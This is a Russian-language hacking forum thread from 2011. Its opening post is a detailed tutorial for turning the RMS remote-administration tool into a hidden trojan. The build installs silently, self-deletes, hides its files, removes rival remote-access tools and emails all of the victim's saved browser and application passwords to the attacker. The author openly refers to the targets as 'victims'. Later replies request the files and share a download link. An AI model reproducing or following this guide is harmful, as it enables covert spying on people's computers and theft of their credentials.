Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Remote Manipulator System (RMS)[удаленное администрирование]
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Новичкам RSS подписка на сообщения с форума Subscribe
Для тех, кто не знает с чего начать. Темы "Хочу стать хакером" удаляются, авторам предупреждение ибо читайте раздел "Статьи"

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] Просмотров - 87782
Remote Manipulator System (RMS)[удаленное администрирование]
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
Alex.Hitch


Novice
# | Сообщение добавлено 26.02.2011 14:26:47
Всем доброго времени суток!
Сегодня мы с вами будем делать скрытую сборку Remote Manipulator System (далее RMS).
Сразу предупреждаю, что самому собрать сборку довольно сложно, особенно новичкам, но потраченные усилия стоят того (об этом позже).
Я постараюсь объяснить все доступным языком.
 
RMS (как и Radmin, TeamViewer etc.) выполняет одну и ту же функцию – удаленное администрирование компьютером через интернет.
Что же умеет RMS? Тут перечислены все его функции, жирным я выделю то, чем отличается от вашего любимого Radmina:
-Управление и наблюдение
-Файловый менеджер
-Текстовый чат
-Диспетчер задач
-Подключение посредством Internet-ID! (так же как у TeamViewer)
-Диспетчер устройств
-Подключение к командной строке
-Запись экрана по расписанию
-Простое текстовое сообщение
-Поддержка нескольких мониторов
-Удаленная установка
-Wake-On-Lan
-Удаленный реестр.
-Функция «Выполнить»
-Подключение к web-камере.
-Самоудаление
-Интеграция с фаерволлом

 
Начну с перечисления того, что собой представляет наша сборка:
1. Полностью скрытая установка (экран не моргает, в отличии от Радмина)
2. После запуска файл самоудаляется.
3. Все файлы скрыты/системны.
4. Все сохраненные пароли компьютера отсылаются к Вам на почту (а именно от Mozilla/Opera/IE/Chrome и много много чего другого, даже от клиента PokerStars), мы будем использовать программу Multi Password Recovery.
5. Также Вам на почту отсылается IP на подключение, но он нам не понадобится скорее всего :)
6. Вес будет ~3мб, но я обычно создаю доунлоадер ~500кб (загружает Вашу сборку с сервера, устанавливает, самоудаляется, я знаю что для доунлоадера это вес громаднейший)
 
Итак, начнем!
 
I. Настройка RMS сервера
 
Первым делом, скачиваем этот архив в котором я все необходимое собрал воедино (вирусов нет – ясное дело), распаковываем куда-нибудь.
 
Открываем папку R, запускаем файл server.exe, устанавливаем (внимание!, в процессе установки галочка Integrate RMS with system Firewall должна стоять!), по завершении установки программа запустится сама:

 
Перед нами появляется окошко Безопасности:

 
Нажимаем Сменить/Установить – вводим пароль, допустим 12345678rms
Переходим во вкладку Аутентификация, стоять должна галочка – Уровень 3
Далее, нажимаем ОК! Все, окошко исчезает.
 
Следующим шагом для нас будет настройка сервера (если у Вас сервер сам не запустился, не появилась синяя иконка в трее, то открываем Пуск, Программы, Remote Manipulator System – Server, Start R-Server)
В правом нижнем углу кликаем правой кнопкой по синему значку - Настройка Internet-ID соединения..
Нажимаем Получить новый ID, появляется что-то похожее:

 
ВАЖНО! Скопируйте этот код куда-нибудь, в блокнот! -это адрес к вашей «жертве».
 
Закрываем окошко.
Далее «Остановить RMS-сервер»
 
Следующим шагом для нас будет вторая часть настройки сервера:
открываем Пуск, Программы, Remote Manipulator System – Server, Settings for R-Server, видим такую картину:

 
Тут будет два шага, первый мы уже прошли («безопасность»).
2. Режим Запуска – Автоматический
3. Настройки, убрать все галочки, поставить только на "запретить закрытие RMS", также во вкладке Логирование галочка должна быть снята.

4. Лицензионный ключ – введите этот либо можете получить свой бесплатно на сайте RMS-F-16D69D1349bF4c9e6526b2Aa7c80Fe17biY2S2dYXlRfDwwnI23iqOGL4oXhioPMc+Kd4YjjsuC3bmImXAYNXEYOV0I3KG8dVEUODllVDmt9ZAQIBAwdWVUObiknDAoEHQIBHAJifGJtCQMKBgELBGtxfFZMDwxRXkUOYnF8UVZFDg4fWlUrEjpcXl4O , далее Окей и закрываем окошко.
5. Закрываем Настройки
 

Открываем директорию, куда установился сервер, и выделяем следующие файлы:

 
Копируем, создаем где-нибудь папку, туда все вставляем.
Именно в этой папке у нас будет происходить все самое интересное,  далее я эту папку буду называть “Новая Папка;)
Продолжаем работать. Теперь нам надо экспортировать наши настройки с паролями и прочее.
Для этого нам нужно сделать следующее:
Для ХР, пуск-выполнить-regedit.exe, и Окей
Для 7, просто в строке «найти программы и файлы» вводим regedit.exe, и Окей

Мы сейчас открыли редактор реестра.
Идем сюда: HKEY_LOCAL_MACHINE/SYSTEM/ далее правой кнопкой по Remote Manipulator System-Экспортировать:

 
И указываем путь нашу созданную папку, (имя файлу задайте - set) в которую мы копировали наши файлы сервера, вот что у Вас должно получиться:

 
Сам по себе файл set.regэто файл настроек, там хранятся все Ваши настройки, если Вы хотите что-то изменить, Вам нужно заменять только этот файл, проделав все предыдущие шаги.
 
II. Добавляем Multi Password Recovery и остальные нужны нам файлы.
 
В скаченном Вами архиве открываем папку M.
В ней ничего менять ненужно, просто все выделяем и копируем в нашу Новую Папку.
В итоге должно получится следующее:

 
III. Редактирование установщика
 
Ну вот, перешли к главной части:
Выделяем install.bat, правой кнопкой - изменить
(первая половина кода служит для того, чтоб на компе жертвы удалить ранее установленный Радмин, Rem_Cam, и если стоял ранее то и RMS, нам ведь не надо чтоб кто-то тоже имел доступ к компьютеру кроме нас).
Тут два простых шага:
1. Создаем почту на Яндексе(!):
2. Пожалуйста, здесь не тупите, чтоб не было потом вопросов!
Находим это почти в самом конце и редактируем вот это под себя:


 
###LOGIN### - это ТОЛЬКО логин, БЕЗ добавления @yandex.ru, ###PASSWORD### - 12345678, тут ясно -указываем свои данные с регистрации в Яндексе.
Закрываем, сохраняем.
 
IV. Почти завершение
 
Если у вас не установлен архиватор 7zip(!), самое время устанавить, он нам нужен для того чтобы правильно архивировать все в один файл, который будет самоудалятся.
 
Установили из папки 7z.
 
Выделяем в Новой Папке файл setup.exe, правой кнопкой 7-zip-открыть архив.
Выделяем все что есть в Новой Папке (кроме setup.exe разумеется) и перетягиваем в то открывшееся окошко. Успешно добавили файлы в архив.
 
В итоге у Вас должно выйти вот это:

 
Копируем куда-нибудь наш файл setup.exe, а все остальное можете удалить из папки.
 
V. Завершение
 
Итак, открываем папку R, устанавливаем файл Viewer.exe, через него мы будем подключаться к «жертве» по Internet-ID. Подробнее об I-ID и программе, читайте в Справке программы либо на оф. сайте. Там точно найдете ответ на волнующий вопрос.
Подключаться можете как по ip (он приходит на почту, так и по Интернет-Ид, если «жертва» за Натом)
 
Предварительно скопируйте папку MultiPass куда-нибудь в Program Files
На почту Вам будет приходить файл *.mpf, в нем хранятся все пароли «жертвы».
Для расшифровки запускаем программу mpr.exe из MultiPass.
Файл – загрузить из файла, и указываем на файл «жертвы». Далее все ясно.
 
Нюанс: если Вы собираетесь свою сборку кидать нескольким «жертвам» и сразу, то ясное дело с Интернет-ИД будут проблемы, так как он присваивается одному компьютеру. В таком случае нужно к каждой «жертве» по ИП подключатся.
Как я лично советую использовать данную сборку.
Вы кидаете её какой-нибудь одной жертве, она его устанавливает, Вы можете по тому ИД (который вы выше копировали) подключаться. Сделали всё что Вам нужно на компьютере жертвы  и делаете дальше так:
В программе подключаетесь к жертве и выбираете подключение «Запуск программ»-Обзор-у жертвы заходите windows\system32\de.exe (ставьте галочку «скрытый запуск»)
de.exe входит в состав сборки. Это само удаляющийся файл, который полностью удаляет  с компа «жертвы» вашу сборку.
После запуска этого файла у жертвы, проверяем, удалилась ли сборка (просто пытаемся подключиться снова), если не можем, это означает сборка успешно удалилась и мы можем использовать нашу сборку на другой жертве точно также как и на первой. Это делается для того чтобы не было конфликтов между двумя  компьютерами с одним И-ИД.

 
Большим преимуществом данной сборки будет то что подключение будет стопроцентным! Даже если жертва имеет непрямой IP.
Также данная сборка интегрируется фаерволом. В настройках можно включить экономию траффика, работать будет пошустрее и меньше траффика кушает. Еще не меньше порадовало наличие встроенного сканера RMS.
В общем – пробуйте и проверяйте все сами ;)
Также я позже напишу как создать даунлоадер, который будет дожидаться подключения к Нэту, скачивать, устанавливать и
 
Жду вопросов!)

Удачи!
Alex Hitch

 
При копировании статьи копирайты обязательны!
Сказать спасибо Ответить Цитировать

Fantomas


Gold Member
# | Сообщение добавлено 26.02.2011 15:46:26
В статьи залей кул будет.
Сказать спасибо Ответить Цитировать

timonoil


Novice
# | Сообщение добавлено 19.08.2011 11:26:17
залейте по новой!
Сказать спасибо Ответить Цитировать

fara16


Novice
# | Сообщение добавлено 21.08.2011 18:28:50
Страница не существует.Залейте по новой плиз...
Сказать спасибо Ответить Цитировать

B3JIoMep




Platinum Member
# | Сообщение добавлено 21.08.2011 18:49:53
Последний раз был 26.02.2011 14:29:15
Вряд ли перезальет, ищите его на других форумах.
 
гений, миллиардер, плейбой, филантроп)0)
Сказать спасибо Ответить Цитировать

jack080


Scum of Society
# | Сообщение добавлено 05.01.2012 15:36:38
добавь скайп jack199650
Сказать спасибо Ответить Цитировать

mmzv1




Novice
# | Сообщение добавлено 13.01.2013 21:23:40
http://04.dl07sd-narod.yandex.ru/disk/19954237001/h2f7c129fc8cfd61813be513fe16f1dd8/utilities_v4.1.rar
Сказать спасибо Ответить Цитировать

Wiskas


Novice
# | Сообщение добавлено 14.01.2013 01:13:16
Отредактировано 14.01.2013 02:20:52 by Wiskas

ах да,###PASSWORD### меняем полностью или ### оставляем?
http://4put.ru/pictures/max/505/1553152.jpg
выдаёт такую ошибку
 
Добавлено 14.01.2013 03:25:50 (через 1 час 5 минут 58 секунд )
 
Вроде получилось,пришли файлы на мыло.но прога не работает(не открывается
Сказать спасибо Ответить Цитировать

mmzv1




Novice
# | Сообщение добавлено 14.01.2013 15:16:54
да скинь если зделал все нормально,###PASSWORD### миняеца полнстю и желательно на @yandx.ru
 
Добавлено 14.01.2013 17:42:09 (через 2 часа 25 минут 15 секунд )
 
file:///N:/Untitled_001.jpg  
Сказать спасибо Ответить Цитировать

Rash89


Novice
# | Сообщение добавлено 14.06.2013 04:20:51
привет всем).Люди подскажите плиз как удалить rms включая все сборки (скрытые и не скрытые) заранее спасибо.
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...
  • GitLab обнаружил множество уязвимостей в исходном коде проектов с...
  • Хакеры используют службу WER в бесфайловых кибератаках
  • Ботнет HEH способен уничтожить все данные на IoT-девайсах

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » необходим взлом почты
  • Взлом и безопасность / Новичкам » Re: Сборщик емэйлов "обрезает" адреса.
  • Взлом и безопасность / Новичкам » Re: Анализ открытых баз данных ElasticSearch (легкий гайд)
  • Взлом и безопасность / Новичкам » Re: Сборщик емэйлов "обрезает" адреса.
  • Взлом и безопасность / Новичкам » Re: Сборщик емэйлов "обрезает" адреса.
  • Взлом и безопасность / Новичкам » Re: Сборщик емэйлов "обрезает" адреса.
  • Взлом и безопасность / Новичкам » Сборщик емэйлов "обрезает" адреса.
  • Взлом и безопасность / Новичкам » Re: Подайте направление, буду учеником, буду благодарен
  • Администрирование / Windows » Re: Востановление Windows 7
  • Взлом и безопасность / Новичкам » Анализ открытых баз данных ElasticSearch (легкий гайд)

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}